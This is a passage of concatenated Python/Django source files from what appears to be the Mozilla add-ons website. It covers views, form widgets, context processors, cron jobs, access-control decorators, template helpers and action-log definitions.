page_srcs = {
'developers': ('developers', 'meet-developers'),
'installed': ('meet-the-developer-post-install', 'post-download'),
'roadblock': ('meetthedeveloper_roadblock', 'roadblock'),
}
# Download src and contribution_src are different.
src, contribution_src = page_srcs.get(page)
return render(request, 'addons/impala/developers.html',
{'addon': addon, 'page': page, 'src': src,
'contribution_src': contribution_src,
'version': version})
@addon_view
def license(request, addon, version=None):
if version is not None:
qs = addon.versions.filter(files__status__in=amo.VALID_STATUSES)
version = get_list_or_404(qs, version=version)[0]
else:
version = addon.current_version
if not (version and version.license):
raise http.Http404
return render(request, 'addons/impala/license.html',
dict(addon=addon, version=version))
def license_redirect(request, version):
version = get_object_or_404(Version, pk=version)
return redirect(version.license_url(), permanent=True)
@session_csrf.anonymous_csrf_exempt
@addon_view
def report_abuse(request, addon):
form = AbuseForm(request.POST or None, request=request)
if request.method == "POST" and form.is_valid():
send_abuse_report(request, addon, form.cleaned_data['text'])
messages.success(request, _('Abuse reported.'))
return http.HttpResponseRedirect(addon.get_url_path())
else:
return render(request, 'addons/report_abuse_full.html',
{'addon': addon, 'abuse_form': form})
########NEW FILE########
__FILENAME__ = widgets
from django import forms
from django.conf import settings
from django.utils.encoding import force_unicode
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from tower import ugettext as _
from addons.models import Category
class IconWidgetRenderer(forms.RadioSelect.renderer):
""" Return radiobox as a list of images. """
def render(self):
""" This will output radios as li>img+input. """
output = []
for w in self:
value = w.choice_value
if value.split('/')[0] == 'icon' or value == '':
o = (("<li><a href='#' class='%s'><img src='%s/%s-32.png'>"
"</a>%s</li>") %
('active' if self.value == w.choice_value else '',
settings.ADDON_ICONS_DEFAULT_URL, w.choice_label, w))
else:
o = "<li class='hide'>%s</li>" % w
output.append(o)
return mark_safe(u'\n'.join(output))
class CategoriesSelectMultiple(forms.CheckboxSelectMultiple):
"""Widget that formats the Categories checkboxes."""
def __init__(self, **kwargs):
super(self.__class__, self).__init__(**kwargs)
def render(self, name, value, attrs=None):
value = value or []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
choices = []
other = None
miscs = Category.objects.filter(misc=True).values_list('id', flat=True)
for c in self.choices:
if c[0] in miscs:
other = (c[0],
_("My add-on doesn't fit into any of the categories"))
else:
choices.append(c)
choices = list(enumerate(choices))
choices_size = len(choices)
groups = [choices]
if other:
groups.append([(choices_size, other)])
str_values = set([force_unicode(v) for v in value])
output = []
for (k, group) in enumerate(groups):
cls = 'addon-misc-category' if k == 1 else 'addon-categories'
output.append(u'<ul class="%s checkbox-choices">' % cls)
for i, (option_value, option_label) in group:
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (
attrs['id'], i))
label_for = u' for="%s"' % final_attrs['id']
else:
label_for = ''
cb = forms.CheckboxInput(
final_attrs, check_test=lambda value: value in str_values)
option_value = force_unicode(option_value)
rendered_cb = cb.render(name, option_value)
option_label = conditional_escape(force_unicode(option_label))
output.append(u'<li><label%s>%s %s</label></li>' % (
label_for, rendered_cb, option_label))
output.append(u'</ul>')
return mark_safe(u'\n'.join(output))
########NEW FILE########
__FILENAME__ = context_processors
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.utils import translation
from django.utils.http import urlquote
import waffle
from cache_nuggets.lib import memoize
from tower import ugettext as _
import amo
from amo.urlresolvers import remora_url, reverse
from access import acl
from zadmin.models import get_config
def app(request):
return {'APP': getattr(request, 'APP', None)}
def static_url(request):
return {'STATIC_URL': settings.STATIC_URL}
def i18n(request):
return {'LANGUAGES': settings.LANGUAGES,
'LANG': settings.LANGUAGE_URL_MAP.get(translation.get_language())
or translation.get_language(),
'DIR': 'rtl' if translation.get_language_bidi() else 'ltr',
}
@memoize('collect-timings')
def get_collect_timings():
# The flag has to be enabled for everyone and then we'll use that
# percentage in the pages.
percent = 0
try:
flag = waffle.models.Flag.objects.get(name='collect-timings')
if flag.everyone and flag.percent:
percent = float(flag.percent) / 100.0
except waffle.models.Flag.DoesNotExist:
pass
return percent
def global_settings(request):
"""
Storing standard AMO-wide information used in global headers, such as
account links and settings.
"""
account_links = []
tools_links = []
context = {}
tools_title = _('Tools')
is_reviewer = False
if request.user.is_authenticated():
amo_user = request.amo_user
profile = request.user
is_reviewer = acl.check_reviewer(request)
account_links.append({'text': _('My Profile'),
'href': profile.get_url_path()})
if not settings.APP_PREVIEW:
account_links.append({
'text': _('My Collections'),
'href': reverse('collections.user', args=[amo_user.username])})
account_links.append({
'text': _('Log out'),
'href': remora_url('/users/logout?to=' + urlquote(request.path)),
})
if request.amo_user.is_developer:
tools_links.append({'text': _('Manage My Submissions'),
'href': reverse('devhub.addons')})
tools_links += [
{'text': _('Submit a New Add-on'),
'href': reverse('devhub.submit.1')},
{'text': _('Developer Hub'),
'href': reverse('devhub.index')},
]
if is_reviewer:
tools_links.append({'text': _('Editor Tools'),
'href': reverse('editors.home')})
if (acl.action_allowed(request, 'Admin', '%') or
acl.action_allowed(request, 'AdminTools', 'View')):
tools_links.append({'text': _('Admin Tools'),
'href': reverse('zadmin.home')})
context['amo_user'] = request.amo_user
else:
context['amo_user'] = AnonymousUser()
context.update({'account_links': account_links,
'settings': settings, 'amo': amo,
'tools_links': tools_links,
'tools_title': tools_title,
'ADMIN_MESSAGE': get_config('site_notice'),
'collect_timings_percent': get_collect_timings(),
'is_reviewer': is_reviewer})
return context
########NEW FILE########
__FILENAME__ = cron
from django.db import connection, transaction
import cronjobs
import commonware.log
import amo
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def expired_resetcode():
"""
Delete password reset codes that have expired.
"""
log.debug('Removing reset codes that have expired...')
cursor = connection.cursor()
cursor.execute("""
UPDATE users SET resetcode=DEFAULT,
resetcode_expires=DEFAULT
WHERE resetcode_expires < NOW()
""")
transaction.commit_unless_managed()
@cronjobs.register
def category_totals():
"""
Update category counts for sidebar navigation.
"""
log.debug('Starting category counts update...')
p = ",".join(['%s'] * len(amo.VALID_STATUSES))
cursor = connection.cursor()
cursor.execute("""
UPDATE categories AS t INNER JOIN (
SELECT at.category_id, COUNT(DISTINCT Addon.id) AS ct
FROM addons AS Addon
INNER JOIN versions AS Version ON (Addon.id = Version.addon_id)
INNER JOIN applications_versions AS av ON (av.version_id = Version.id)
INNER JOIN addons_categories AS at ON (at.addon_id = Addon.id)
INNER JOIN files AS File ON (Version.id = File.version_id
AND File.status IN (%s))
WHERE Addon.status IN (%s) AND Addon.inactive = 0
GROUP BY at.category_id)
AS j ON (t.id = j.category_id)
SET t.count = j.ct
""" % (p, p), amo.VALID_STATUSES * 2)
transaction.commit_unless_managed()
########NEW FILE########
__FILENAME__ = decorators
import datetime
import functools
import json
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
import commonware.log
from . import models as context
from .utils import JSONEncoder, redirect_for_login
from amo import get_user, set_user
from users.utils import get_task_user
task_log = commonware.log.getLogger('z.task')
def login_required(f=None, redirect=True):
"""
Like Django's login_required, but with to= instead of next=.
If redirect=False then we return 401 instead of redirecting to the
login page. That's nice for ajax views.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(request, *args, **kw):
if request.user.is_authenticated():
return func(request, *args, **kw)
else:
if redirect:
return redirect_for_login(request)
else:
return http.HttpResponse(status=401)
return wrapper
if f:
return decorator(f)
else:
return decorator
def post_required(f):
@functools.wraps(f)
def wrapper(request, *args, **kw):
if request.method != 'POST':
return http.HttpResponseNotAllowed(['POST'])
else:
return f(request, *args, **kw)
return wrapper
def permission_required(app, action):
def decorator(f):
@functools.wraps(f)
@login_required
def wrapper(request, *args, **kw):
from access import acl
if acl.action_allowed(request, app, action):
return f(request, *args, **kw)
else:
raise PermissionDenied
return wrapper
return decorator
def any_permission_required(pairs):
"""
If any permission passes, call the function. Otherwise raise 403.
"""
def decorator(f):
@functools.wraps(f)
@login_required
def wrapper(request, *args, **kw):
from access import acl
for app, action in pairs:
if acl.action_allowed(request, app, action):
return f(request, *args, **kw)
raise PermissionDenied
return wrapper
return decorator
def restricted_content(f):
"""
Prevent access to a view function for accounts restricted from
posting user-generated content.
"""
@functools.wraps(f)
def wrapper(request, *args, **kw):
from access import acl
if (acl.action_allowed(request, '*', '*')
or not acl.action_allowed(request, 'Restricted', 'UGC')):
return f(request, *args, **kw)
else:
raise PermissionDenied
return wrapper
def modal_view(f):
@functools.wraps(f)
def wrapper(*args, **kw):
response = f(*args, modal=True, **kw)
return response
return wrapper
def json_response(response, has_trans=False, status_code=200):
"""
Return a response as JSON. If you are just wrapping a view,
then use the json_view decorator.
"""
if has_trans:
response = json.dumps(response, cls=JSONEncoder)
else:
response = json.dumps(response)
return http.HttpResponse(response,
content_type='application/json',
status=status_code)
def json_view(f=None, has_trans=False, status_code=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
response = func(*args, **kw)
if isinstance(response, http.HttpResponse):
return response
else:
return json_response(response, has_trans=has_trans,
status_code=status_code)
return wrapper
if f:
return decorator(f)
else:
return decorator
json_view.error = lambda s: http.HttpResponseBadRequest(
json.dumps(s), content_type='application/json')
class skip_cache(object):
def __init__(self, f):
self.f = f
functools.update_wrapper(self, f)
def __call__(self, *args, **kw):
with context.skip_cache():
return self.f(*args, **kw)
def __repr__(self):
"<SkipCache %s>" % (self.f,)
def __get__(self, obj, typ=None):
return skip_cache(self.f.__get__(obj, typ))
def use_master(f):
@functools.wraps(f)
def wrapper(*args, **kw):
with context.use_master():
return f(*args, **kw)
return wrapper
def write(f):
return use_master(skip_cache(f))
def set_modified_on(f):
"""
Will update the modified timestamp on the provided objects when the wrapped
function exits sucessfully (returns a truthy value). If the function
returns a dict, it will also use that dict as additional keyword arguments
to update on the provided objects.
Looks up objects defined in the set_modified_on kwarg.
"""
from amo.tasks import set_modified_on_object
@functools.wraps(f)
def wrapper(*args, **kw):
objs = kw.pop('set_modified_on', None)
result = f(*args, **kw)
if objs and result:
extra_kwargs = result if isinstance(result, dict) else {}
for obj in objs:
task_log.info('Delaying setting modified on object: %s, %s' %
(obj.__class__.__name__, obj.pk))
set_modified_on_object.apply_async(
args=[obj], kwargs=extra_kwargs,
eta=datetime.datetime.now() +
datetime.timedelta(seconds=settings.NFS_LAG_DELAY))
return result
return wrapper
def allow_cross_site_request(f):
"""Allow other sites to access this resource, see
https://developer.mozilla.org/en/HTTP_access_control."""
@functools.wraps(f)
def wrapper(request, *args, **kw):
response = f(request, *args, **kw)
"""If Access-Control-Allow-Credentials isn't set, the browser won't
return data required cookies to see. This is a good thing, let's keep
it that way."""
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'GET'
return response
return wrapper
def set_task_user(f):
"""Sets the user to be the task user, then unsets it."""
@functools.wraps(f)
def wrapper(*args, **kw):
old_user = get_user()
set_user(get_task_user())
try:
result = f(*args, **kw)
finally:
set_user(old_user)
return result
return wrapper
def allow_mine(f):
@functools.wraps(f)
def wrapper(request, username, *args, **kw):
"""
If the author is `mine` then show the current user's collection
(or something).
"""
if username == 'mine':
if not request.amo_user:
return redirect_for_login(request)
username = request.amo_user.username
return f(request, username, *args, **kw)
return wrapper
########NEW FILE########
__FILENAME__ = ext
import jinja2.runtime
from jinja2 import nodes
import caching.ext
class FragmentCacheExtension(caching.ext.FragmentCacheExtension):
"""Extends the default fragment cache to include request.APP in the key."""
def process_cache_arguments(self, args):
args.append(nodes.Getattr(nodes.ContextReference(), 'request', 'load'))
def _cache_support(self, name, obj, timeout, extra, request, caller):
if isinstance(request, jinja2.runtime.Undefined):
key = name
else:
if request.user.is_authenticated():
return caller()
else:
key = '%s:%s' % (name, request.APP.id)
sup = super(FragmentCacheExtension, self)._cache_support
return sup(key, obj, timeout, extra, caller)
cache = FragmentCacheExtension
########NEW FILE########
__FILENAME__ = fields
import re
from django.core import exceptions
from django.db import models
from django.forms import fields
from tower import ugettext as _
from amo.widgets import ColorWidget
class DecimalCharField(models.DecimalField):
"""Like the standard django DecimalField but stored in a varchar
In order to gracefully read crappy data, use nullify_invalid=True.
This will set the field's value to None rather than raising an exception
whenever a non-null, non-decimal string is read from a queryset.
However, use this option with caution as it also prevents exceptions
from being raised during model property assignment. This could allow you
to "successfuly" save a ton of data when all that is really written
is NULL. It might be best to combine this with the null=False option.
"""
description = 'Decimal number stored as a varchar'
__metaclass__ = models.SubfieldBase
def __init__(self, verbose_name=None, name=None, max_digits=None,
decimal_places=None, nullify_invalid=False, **kwargs):
self.nullify_invalid = nullify_invalid
kwargs['max_length'] = max_digits + 1
super(DecimalCharField, self).__init__(verbose_name, name,
max_digits=max_digits, decimal_places=decimal_places, **kwargs)
def get_internal_type(self):
return "CharField"
def to_python(self, value):
try:
return super(DecimalCharField, self).to_python(value)
except exceptions.ValidationError:
if self.nullify_invalid:
return None
else:
raise
def get_db_prep_save(self, value, connection, prepared=False):
if prepared:
return value
else:
return self.get_prep_value(value)
def get_prep_value(self, value):
if value is None:
return value
return self.format_number(value)
class ColorField(fields.CharField):
widget = ColorWidget
def __init__(self, max_length=7, min_length=None, *args, **kwargs):
super(ColorField, self).__init__(max_length, min_length, *args,
**kwargs)
def clean(self, value):
super(ColorField, self).clean(value)
if value and not re.match('^\#([0-9a-fA-F]{6})$', value):
raise exceptions.ValidationError(
_(u'This must be a valid hex color code, such as #000000.'))
return value
class SeparatedValuesField(fields.Field):
"""
Field that allows the given base field to accept multiple values using
the given separator.
E.g.::
>>> field = SeparatedValuesField(forms.EmailField)
>>> field.clean(u'[email protected],, \n,[email protected]')
u'[email protected], [email protected]'
"""
def __init__(self, base_field, separator=None, *args, **kwargs):
super(SeparatedValuesField, self).__init__(*args, **kwargs)
self.base_field = base_field
self.separator = separator or ','
def clean(self, data):
if not data:
if self.required:
raise exceptions.ValidationError(
_(u'Enter at least one value.'))
else:
return None
value_list = filter(None, map(unicode.strip,
data.split(self.separator)))
self.value_list = []
base_field = self.base_field()
for value in value_list:
if value:
self.value_list.append(base_field.clean(value))
return u', '.join(self.value_list)
########NEW FILE########
__FILENAME__ = forms
from copy import copy
from django import forms
from django.conf import settings
import captcha.fields
import happyforms
from translations.fields import TranslatedField
class AbuseForm(happyforms.Form):
recaptcha = captcha.fields.ReCaptchaField(label='')
text = forms.CharField(required=True,
label='',
widget=forms.Textarea())
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
self.has_recaptcha = True
super(AbuseForm, self).__init__(*args, **kwargs)
if (not self.request.user.is_anonymous() or
not settings.RECAPTCHA_PRIVATE_KEY):
del self.fields['recaptcha']
self.has_recaptcha = False
class AMOModelForm(happyforms.ModelForm):
def _get_changed_data(self):
"""
The standard modelform thinks the Translation PKs are the initial
values. We need to dig deeper to assert whether there are indeed
changes.
"""
Model = self._meta.model
if self._changed_data is None:
changed = copy(forms.ModelForm.changed_data.__get__(self))
fieldnames = [f.name for f in Model._meta.fields]
fields = [(name, Model._meta.get_field(name))
for name in changed if name in fieldnames]
trans = [name for name, field in fields
if isinstance(field, TranslatedField)]
# If there are translated fields, pull the model from the database
# and do comparisons.
if trans:
try:
orig = Model.objects.get(pk=self.instance.pk)
except Model.DoesNotExist:
return self._changed_data
for field in trans:
if getattr(orig, field) == getattr(self.instance, field):
self._changed_data.remove(field)
return self._changed_data
changed_data = property(_get_changed_data)
########NEW FILE########
__FILENAME__ = helpers
import collections
import json as jsonlib
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.template import defaultfilters
from django.utils import translation
from django.utils.encoding import smart_unicode
import caching.base as caching
import jinja2
import six
from babel.support import Format
from jingo import register, env
# Needed to make sure our own |f filter overrides jingo's one.
from jingo import helpers # noqa
from tower import ugettext as _, strip_whitespace
import amo
from amo import urlresolvers, utils
from constants.licenses import PERSONA_LICENSES_IDS
from translations.helpers import truncate
from translations.query import order_by_translation
from versions.models import License
# Yanking filters from Django.
register.filter(defaultfilters.slugify)
# Registering some utils as filters:
urlparams = register.filter(utils.urlparams)
register.filter(utils.epoch)
register.filter(utils.isotime)
register.function(dict)
register.function(utils.randslice)
@register.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@register.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@register.filter
def babel_datetime(dt, format='medium'):
return _get_format().datetime(dt, format=format) if dt else ''
@register.filter
def babel_date(date, format='medium'):
return _get_format().date(date, format=format) if date else ''
@register.function
def locale_url(url):
"""Marketplace doesn't use locale prefixed URLs but we call this a lot."""
# TODO: Remove uses of this in templates.
return url
@register.inclusion_tag('includes/refinements.html')
@jinja2.contextfunction
def refinements(context, items, title, thing):
d = dict(context.items())
d.update(items=items, title=title, thing=thing)
return d
@register.function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
@register.function
def shared_url(viewname, addon, *args, **kwargs):
"""
Helper specifically for addons or apps to get urls. Requires
the viewname, addon (or app). It's assumed that we'll pass the
slug into the args and we'll look up the right slug (addon or app)
for you.
Viewname should be a normal view eg: `addons.details` or `apps.details`.
`addons.details` becomes `apps.details`, if we've passed an app, etc.
A viewname such as `details` becomes `addons.details` or `apps.details`,
depending on the add-on type.
"""
slug = addon.app_slug if addon.is_webapp() else addon.slug
prefix = 'apps' if addon.is_webapp() else 'addons'
namespace, dot, latter = viewname.partition('.')
# If `viewname` is prefixed with `addons.` but we're linking to a
# webapp, the `viewname` magically gets prefixed with `apps.`.
if namespace in ('addons', 'apps'):
viewname = latter
# Otherwise, we just slap the appropriate prefix in front of `viewname`.
viewname = '.'.join([prefix, viewname])
return url(viewname, *([slug] + list(args)), **kwargs)
@register.filter
def paginator(pager):
return Paginator(pager).render()
@register.filter
def impala_paginator(pager):
t = env.get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@register.filter
def mobile_paginator(pager):
t = env.get_template('amo/mobile/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@register.filter
def mobile_impala_paginator(pager):
# Impala-style paginator that is easier to mobilefy.
t = env.get_template('amo/mobile/impala_paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@register.function
def is_mobile(app):
return app == amo.MOBILE
@register.function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from addons.models import Category
if app is None:
return [], []
# We muck with query to make order_by and extra_order_by play nice.
q = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
categories = order_by_translation(q, 'name')
categories.query.extra_order_by.insert(0, 'weight')
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, _('Collections'), base + 'collections/')]
return categories, sorted(types, key=lambda x: x.name)
class Paginator(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = env.get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
def _get_format():
lang = translation.get_language()
return Format(utils.get_locale_from_lang(lang))
@register.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
@register.filter
def currencyfmt(num, currency):
if num is None:
return ''
return _get_format().currency(num, currency)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return _(u'Add-ons for {0}').format(app.pretty)
else:
return _('Add-ons')
@register.function
@jinja2.contextfunction
def login_link(context):
next = context['request'].path
qs = context['request'].GET.urlencode()
if qs:
next += '?' + qs
l = urlparams(urlresolvers.reverse('users.login'), to=next)
return l
@register.function
@jinja2.contextfunction
def page_title(context, title, force_webapps=False):
title = smart_unicode(title)
if settings.APP_PREVIEW:
base_title = _('Firefox Marketplace')
elif context.get('WEBAPPS') or force_webapps:
base_title = _('Firefox Marketplace')
else:
base_title = page_name(context['request'].APP)
return u'%s :: %s' % (title, base_title)
@register.function
@jinja2.contextfunction
def breadcrumbs(context, items=list(), add_default=True, crumb_size=40):
"""
show a list of breadcrumbs. If url is None, it won't be a link.
Accepts: [(url, label)]
"""
if add_default:
app = context['request'].APP
crumbs = [(urlresolvers.reverse('home'), page_name(app))]
else:
crumbs = []
# add user-defined breadcrumbs
if items:
try:
crumbs += items
except TypeError:
crumbs.append(items)
crumbs = [(url, truncate(label, crumb_size)) for (url, label) in crumbs]
c = {'breadcrumbs': crumbs}
t = env.get_template('amo/breadcrumbs.html').render(c)
return jinja2.Markup(t)
@register.function
@jinja2.contextfunction
def impala_breadcrumbs(context, items=list(), add_default=True, crumb_size=40):
"""
show a list of breadcrumbs. If url is None, it won't be a link.
Accepts: [(url, label)]
"""
if add_default:
if context.get('WEBAPPS'):
base_title = _('Apps Marketplace')
else:
base_title = page_name(context['request'].APP)
crumbs = [(urlresolvers.reverse('home'), base_title)]
else:
crumbs = []
# add user-defined breadcrumbs
if items:
try:
crumbs += items
except TypeError:
crumbs.append(items)
crumbs = [(url, truncate(label, crumb_size)) for (url, label) in crumbs]
c = {'breadcrumbs': crumbs, 'has_home': add_default}
t = env.get_template('amo/impala/breadcrumbs.html').render(c)
return jinja2.Markup(t)
@register.filter
def json(s):
return jsonlib.dumps(s)
@register.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
@register.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@register.filter
def strip_html(s, just_kidding=False):
"""Strips HTML. Confirm lets us opt out easily."""
if just_kidding:
return s
if not s:
return ''
else:
s = re.sub(r'<.*?>', '', smart_unicode(s, errors='ignore'))
return re.sub(r'<.*?>', '', s)
@register.filter
def external_url(url):
"""Bounce a URL off outgoing.mozilla.org."""
return urlresolvers.get_outgoing_url(unicode(url))
@register.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@register.function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
if isinstance(license, (long, int)):
if license in PERSONA_LICENSES_IDS:
# Grab built-in license.
license = PERSONA_LICENSES_IDS[license]
else:
# Grab custom license.
license = License.objects.filter(id=license)
if not license.exists():
return ''
license = license[0]
elif not license:
return ''
if not getattr(license, 'builtin', True):
return _('Custom License')
t = env.get_template('amo/license_link.html').render({'license': license})
return jinja2.Markup(t)
@register.function
def field(field, label=None, **attrs):
if label is not None:
field.label = label
# HTML from Django is already escaped.
return jinja2.Markup(u'%s<p>%s%s</p>' %
(field.errors, field.label_tag(),
field.as_widget(attrs=attrs)))
@register.inclusion_tag('amo/category-arrow.html')
@jinja2.contextfunction
def category_arrow(context, key, prefix):
d = dict(context.items())
d.update(key=key, prefix=prefix)
return d
@register.filter
def timesince(time):
if not time:
return u''
ago = defaultfilters.timesince(time)
# L10n: relative time in the past, like '4 days ago'
return _(u'{0} ago').format(ago)
@register.inclusion_tag('amo/recaptcha.html')
@jinja2.contextfunction
def recaptcha(context, form):
d = dict(context.items())
d.update(form=form)
return d
@register.filter
def is_choice_field(value):
try:
return isinstance(value.field.widget, CheckboxInput)
except AttributeError:
pass
@register.inclusion_tag('amo/mobile/sort_by.html')
def mobile_sort_by(base_url, options=None, selected=None, extra_sort_opts=None,
search_filter=None):
if search_filter:
selected = search_filter.field
options = search_filter.opts
if hasattr(search_filter, 'extras'):
options += search_filter.extras
if extra_sort_opts:
options_dict = dict(options + extra_sort_opts)
else:
options_dict = dict(options)
if selected in options_dict:
current = options_dict[selected]
else:
selected, current = options[0] # Default to the first option.
return locals()
@register.function
@jinja2.contextfunction
def media(context, url, key='MEDIA_URL'):
"""Get a MEDIA_URL link with a cache buster querystring."""
if 'BUILD_ID' in context:
build = context['BUILD_ID']
else:
if url.endswith('.js'):
build = context['BUILD_ID_JS']
elif url.endswith('.css'):
build = context['BUILD_ID_CSS']
else:
build = context['BUILD_ID_IMG']
return urljoin(context[key], utils.urlparams(url, b=build))
@register.function
@jinja2.contextfunction
def static(context, url):
"""Get a STATIC_URL link with a cache buster querystring."""
return media(context, url, 'STATIC_URL')
@register.function
@jinja2.evalcontextfunction
def attrs(ctx, *args, **kw):
return jinja2.filters.do_xmlattr(ctx, dict(*args, **kw))
@register.function
@jinja2.contextfunction
def side_nav(context, addon_type, category=None):
app = context['request'].APP.id
cat = str(category.id) if category else 'all'
return caching.cached(lambda: _side_nav(context, addon_type, category),
'side-nav-%s-%s-%s' % (app, addon_type, cat))
def _side_nav(context, addon_type, cat):
# Prevent helpers generating circular imports.
from addons.models import Category, AddonType
request = context['request']
qs = Category.objects.filter(weight__gte=0)
if addon_type not in (amo.ADDON_PERSONA, amo.ADDON_WEBAPP):
qs = qs.filter(application=request.APP.id)
sort_key = attrgetter('weight', 'name')
categories = sorted(qs.filter(type=addon_type), key=sort_key)
if cat:
base_url = cat.get_url_path()
else:
base_url = AddonType(addon_type).get_url_path()
ctx = dict(request=request, base_url=base_url, categories=categories,
addon_type=addon_type, amo=amo)
return jinja2.Markup(env.get_template('amo/side_nav.html').render(ctx))
@register.function
@jinja2.contextfunction
def site_nav(context):
app = context['request'].APP.id
return caching.cached(lambda: _site_nav(context), 'site-nav-%s' % app)
def _site_nav(context):
# Prevent helpers from generating circular imports.
from addons.models import Category
request = context['request']
sorted_cats = lambda qs: sorted(qs, key=attrgetter('weight', 'name'))
extensions = Category.objects.filter(application=request.APP.id,
weight__gte=0, type=amo.ADDON_EXTENSION)
ctx = dict(request=request, amo=amo,
extensions=sorted_cats(extensions))
return jinja2.Markup(env.get_template('amo/site_nav.html').render(ctx))
@register.filter
def premium_text(type):
return amo.ADDON_PREMIUM_TYPES[type]
@register.function
def loc(s):
"""A noop function for strings that are not ready to be localized."""
return strip_whitespace(s)
@register.function
@jinja2.contextfunction
def remora_url(context, url, lang=None, app=None, prefix=''):
"""Wrapper for urlresolvers.remora_url"""
if lang is None:
_lang = context['LANG']
if _lang:
lang = translation.to_locale(_lang).replace('_', '-')
if app is None:
try:
app = context['APP'].short
except (AttributeError, KeyError):
pass
return urlresolvers.remora_url(url=url, lang=lang, app=app, prefix=prefix)
@register.function
@jinja2.contextfunction
def hasOneToOne(context, obj, attr):
try:
getattr(obj, attr)
return True
except ObjectDoesNotExist:
return False
@register.function
def no_results_amo():
# This prints a "No results found" message. That's all. Carry on.
t = env.get_template('amo/no_results.html').render()
return jinja2.Markup(t)
@register.filter
def f(string, *args, **kwargs):
"""This overrides jingo.helpers.f to convert input to unicode if needed.
This is needed because of
https://github.com/jbalogh/jingo/pull/54#issuecomment-36728948
"""
if not isinstance(string, six.text_type):
string = six.text_type(string)
return string.format(*args, **kwargs)
########NEW FILE########
__FILENAME__ = log
from inspect import isclass
from django.conf import settings
from django.core.files.storage import get_storage_class
from celery.datastructures import AttributeDict
from tower import ugettext_lazy as _
__all__ = ('LOG', 'LOG_BY_ID', 'LOG_KEEP',)
class _LOG(object):
action_class = None
class CREATE_ADDON(_LOG):
id = 1
action_class = 'add'
format = _(u'{addon} was created.')
keep = True
class EDIT_PROPERTIES(_LOG):
""" Expects: addon """
id = 2
action_class = 'edit'
format = _(u'{addon} properties edited.')
class EDIT_DESCRIPTIONS(_LOG):
id = 3
action_class = 'edit'
format = _(u'{addon} description edited.')
class EDIT_CATEGORIES(_LOG):
id = 4
action_class = 'edit'
format = _(u'Categories edited for {addon}.')
class ADD_USER_WITH_ROLE(_LOG):
id = 5
action_class = 'add'
format = _(u'{0.name} ({1}) added to {addon}.')
keep = True
class REMOVE_USER_WITH_ROLE(_LOG):
id = 6
action_class = 'delete'
# L10n: {0} is the user being removed, {1} is their role.
format = _(u'{0.name} ({1}) removed from {addon}.')
keep = True
class EDIT_CONTRIBUTIONS(_LOG):
id = 7
action_class = 'edit'
format = _(u'Contributions for {addon}.')
class USER_DISABLE(_LOG):
id = 8
format = _(u'{addon} disabled.')
keep = True
class USER_ENABLE(_LOG):
id = 9
format = _(u'{addon} enabled.')
keep = True
# TODO(davedash): Log these types when pages are present
class SET_PUBLIC_STATS(_LOG):
id = 10
format = _(u'Stats set public for {addon}.')
keep = True
# TODO(davedash): Log these types when pages are present
class UNSET_PUBLIC_STATS(_LOG):
id = 11
format = _(u'{addon} stats set to private.')
keep = True
class CHANGE_STATUS(_LOG):
id = 12
# L10n: {0} is the status
format = _(u'{addon} status changed to {0}.')
keep = True
class ADD_PREVIEW(_LOG):
id = 13
action_class = 'add'
format = _(u'Preview added to {addon}.')
class EDIT_PREVIEW(_LOG):
id = 14
action_class = 'edit'
format = _(u'Preview edited for {addon}.')
class DELETE_PREVIEW(_LOG):
id = 15
action_class = 'delete'
format = _(u'Preview deleted from {addon}.')
class ADD_VERSION(_LOG):
id = 16
action_class = 'add'
format = _(u'{version} added to {addon}.')
keep = True
